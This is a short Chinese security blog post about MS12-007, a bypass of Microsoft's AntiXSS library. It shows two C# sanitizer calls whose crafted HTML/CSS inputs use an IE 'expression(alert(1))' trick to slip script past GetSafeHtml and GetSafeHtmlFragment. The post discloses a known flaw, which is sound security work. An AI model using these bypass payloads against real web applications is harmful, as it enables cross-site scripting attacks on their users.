MS12-007
发布:wpulog | 发布时间: 2012年1月19日 (MS12-007)AntiXSS 库绕过漏洞,Microsoft 防跨站点脚本 (AntiXSS) 库未正确清理特制的HTML,导致执行XSS代码。具体原因是Sanitizer对象的GetSafeHTML或GetSafeHTMLFragmen方法可以被css+expression绕过,具体如下:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
2. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
又是expression,expression是ms给xsser们留的backdoor吗?给写parser和regex的人们带来了无穷的烦恼啊,yahoo mail的邮件正文中不知道彻底解决这个问题没有,好久没搞过xss了,看到这段绕过代码,有种熟悉的感觉就YY了两句。
[+]Reference:
~~~~~~~~~
http://blog.watchfire.com/wfblog/2012/01/microsoft-anti-xss-library-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SecurityBloggersNetwork+%28Security+Bloggers+Network%29
出自:BugZone - http://www.pulog.org/poc/2378/MS12-007/ 转载必须注明!
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。